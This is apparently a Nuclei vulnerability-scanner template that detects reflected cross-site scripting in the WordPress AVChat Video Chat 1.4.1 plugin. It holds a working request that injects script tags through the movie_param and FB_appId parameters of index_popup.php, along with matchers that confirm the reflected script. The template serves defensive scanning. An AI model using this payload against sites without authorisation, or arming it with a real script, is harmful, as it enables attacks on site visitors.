id: avchat-video-chat-xss

info:
  name: WordPress AVChat Video Chat 1.4.1 - Cross-Site Scripting
  author: DhiyaneshDK
  severity: medium
  description: |
    WordPress AVChat Video Chat 1.4.1 is vulnerable to reflected cross-site scripting via index_popup.php and multiple parameters.
  reference:
    - https://codevigilant.com/disclosure/wp-plugin-avchat-3-a3-cross-site-scripting-xss/
    - https://wpscan.com/vulnerability/fce99c82-3958-4c17-88d3-6e8fa1a11e59
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 5.4
    cwe-id: CWE-80
  metadata:
    verified: true
    max-request: 1
  tags: xss,,wp,wpscan,wordpress,wp-plugin

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/avchat-3/index_popup.php?movie_param=%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&FB_appId=FB_appId%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'value="FB_appId"><script>alert(document.domain)</script>"'

      - type: word
        words:
          - 'text/html'
        part: header

      - type: status
        status:
          - 200

# digest: 4a0a00473045022030dfeaa515ab598f81227f548d8f5bc64384519f35f2d0b93eaaf65c35fb102b022100c958e503a704934061d992c78cf74cae64e02589422e9cac2a17b97a595acd9f:922c64590222798bb761d5b6d8e72950
